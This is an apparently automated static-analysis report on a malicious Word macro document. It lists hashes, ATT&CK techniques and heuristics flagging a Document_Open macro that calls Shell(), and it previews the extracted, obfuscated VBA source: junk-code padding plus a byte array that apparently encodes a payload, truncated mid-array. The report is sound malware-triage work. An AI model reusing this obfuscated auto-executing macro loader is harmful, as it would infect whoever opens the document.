Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 28a3713293fa7d24…

MALICIOUS

Office (OLE)

333.0 KB Created: 2016-01-20 15:55:00 Authoring application: Microsoft Office Word First seen: 2017-10-28
MD5: 4bf6423270e3e0e66333e4f7a9bc7740 SHA-1: 68e9529561a744c974a19dda6d720480060304e5 SHA-256: 28a3713293fa7d24f66a45e95c44228409739de6ba8ca99a88ffadae92aca044
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a Microsoft Office document containing VBA macros. The 'Document_Open' macro is present and triggers the execution of the Shell() function, indicating an attempt to run an external process. This is a common technique for downloading and executing second-stage malware. No specific family could be identified.

Heuristics 5

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 123793 bytes
SHA-256: 35d1cf35e31c584f2952d829fd82f1934aa80cda8503b3b22780e1788ffa4b17
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim zD(7494) As Byte
Function zKK(JushwFhxEM As Integer) As Boolean
R2zUAoXdww3bkd = "6" & "66"
Static RDIMvY As Byte
YAMiVZCF117dgq = "43" & "54"
RDIMvY = RDIMvY + 1
OgRscICj = "83" & "8"
If RDIMvY = 1 Then Debug.Assert Not zKK(84)
VGo34 = "33" & "33"
zKK = RDIMvY = 0
Vm34ps = "83" & "30"
RDIMvY = 0
Hb4JlH4Dx8Xvc = "17" & "55"
End Function
Sub LQpw5n()
IpeKZxZllVC3d = "57" & "35"
Second 92
Partition 29, 67, 5, 93
Beep
DateSerial 73, 34, 51
NPer 52, 49, 59
Lv4tGeL = QBColor(30)
Tan 17
If CDec(31) = True Then Au63TXr4CpYXD = 88
Atn 14
If IsMissing(13) = True Then V04JIOOAS = 43
IEKvOuGYmBR = "21" & "40"
End Sub
Sub NKynj()
zD(0) = 168
zD(1) = 160
zD(2) = 162
zD(3) = 229
zD(4) = 174
zD(5) = 181
zD(6) = 6
zD(7) = 105
zD(8) = 116
zD(9) = 45
zD(10) = 77
zD(11) = 104
zD(12) = 28
zD(13) = 120
zD(14) = 60
zD(15) = 95
zD(16) = 37
zD(17) = 115
zD(18) = 73
zD(19) = 36
zD(20) = 112
zD(21) = 97
zD(22) = 1
zD(23) = 4
zD(24) = 106
zD(25) = 72
zD(26) = 10
zD(27) = 59
zD(28) = 49
zD(29) = 49
zD(30) = 84
zD(31) = 9
zD(32) = 42
zD(33) = 105
zD(34) = 105
zD(35) = 67
zD(36) = 51
zD(37) = 15
zD(38) = 0
zD(39) = 29
zD(40) = 10
zD(41) = 69
zD(42) = 78
zD(43) = 67
zD(44) = 51
zD(45) = 57
zD(46) = 62
zD(47) = 54
zD(48) = 111
zD(49) = 108
zD(50) = 112
zD(51) = 34
zD(52) = 40
zD(53) = 110
zD(54) = 38
zD(55) = 111
zD(56) = 111
zD(57) = 43
zD(58) = 34
zD(59) = 40
zD(60) = 65
zD(61) = 102
zD(62) = 99
zD(63) = 46
zD(64) = 68
zD(65) = 9
zD(66) = 99
zD(67) = 82
zD(68) = 95
zD(69) = 89
zD(70) = 26
zD(71) = 68
zD(72) = 6
zD(73) = 76
zD(74) = 48
zD(75) = 52
zD(76) = 99
zD(77) = 60
zD(78) = 113
zD(79) = 84
zD(80) = 13
zD(81) = 122
zD(82) = 87
zD(83) = 108
zD(84) = 45
zD(85) = 80
zD(86) = 38
zD(87) = 117
zD(88) = 40
zD(89) = 11
zD(90) = 45
zD(91) = 46
zD(92) = 68
zD(93) = 17
zD(94) = 8
zD(95) = 76
zD(96) = 23
zD(97) = 12
zD(98) = 51
zD(99) = 100
zD(100) = 36
zD(101) = 38
zD(102) = 25
zD(103) = 5
zD(104) = 104
zD(105) = 30
zD(106) = 28
zD(107) = 112
zD(108) = 26
zD(109) = 14
zD(110) = 12
zD(111) = 54
zD(112) = 13
zD(113) = 82
zD(114) = 0
zD(115) = 49
zD(116) = 52
zD(117) = 52
zD(118) = 5
zD(119) = 106
zD(120) = 100
zD(121) = 116
zD(122) = 111
zD(123) = 21
zD(124) = 121
zD(125) = 50
zD(126) = 88
zD(127) = 114
zD(128) = 156
zD(129) = 153
zD(130) = 164
zD(131) = 129
zD(132) = 255
zD(133) = 201
zD(134) = 240
zD(135) = 211
zD(136) = 235
zD(137) = 220
zD(138) = 152
zD(139) = 128
zD(140) = 143
zD(141) = 150
zD(142) = 159
zD(143) = 150
zD(144) = 132
zD(145) = 236
zD(146) = 200
zD(147) = 199
zD(148) = 130
zD(149) = 229
zD(150) = 157
zD(151) = 222
zD(152) = 212
zD(153) = 240
zD(154) = 228
zD(155) = 216
zD(156) = 248
zD(157) = 227
zD(158) = 129
zD(159) = 145
zD(160) = 182
zD(161) = 217
zD(162) = 128
zD(163) = 170
zD(164) = 239
zD(165) = 202
zD(166) = 233
zD(167) = 190
zD(168) = 202
zD(169) = 202
zD(170) = 130
zD(171) = 229
zD(172) = 240
zD(173) = 134
zD(174) = 207
zD(175) = 161
zD(176) = 138
zD(177) = 199
zD(178) = 194
zD(179) = 229
zD(180) = 181
zD(181) = 224
zD(182) = 201
zD(183) = 205
zD(184) = 239
zD(185) = 203
zD(186) = 233
zD(187) = 220
zD(188) = 243
zD(189) = 245
zD(190) = 183
zD(191) = 182
zD(192) = 191
zD(193) = 224
zD(194) = 212
zD(195) = 173
zD(196) = 136
zD(197) = 213
zD(198) = 220
zD(199) = 209
zD(200) = 226
zD(201) = 250
zD(202) = 205
zD(203) = 147
zD(204) = 130
zD(205) = 131
zD(206) = 167
zD(207) = 246
zD(208) = 145
zD(209) = 132
zD(210) = 148
zD(211) = 173
zD(212) = 129
zD(213) = 166
zD(214) = 156
zD(215) = 165
zD(216) = 138
zD(217) = 153
zD(218) = 169
zD(219) = 210
zD(220) = 202
zD(221) = 209
zD(222) = 219
zD(223) = 201
zD(224
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.